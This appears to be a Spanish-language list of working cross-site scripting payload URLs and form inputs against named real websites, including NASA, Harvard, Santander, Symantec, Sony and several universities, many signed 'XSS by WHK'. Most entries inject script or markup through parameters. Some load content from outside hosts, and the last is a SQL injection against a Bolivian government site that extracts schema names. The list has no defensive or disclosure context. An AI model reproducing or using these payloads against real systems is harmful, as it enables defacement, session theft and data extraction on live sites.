http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0

"><script>alert(/xss/.source)</script>

http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E

http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )

http://elhacker.org/ (en el buscador poner "><h1>XSS )

http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5

http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>

http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E

http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5

http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>

http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>

http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0

http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D

http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))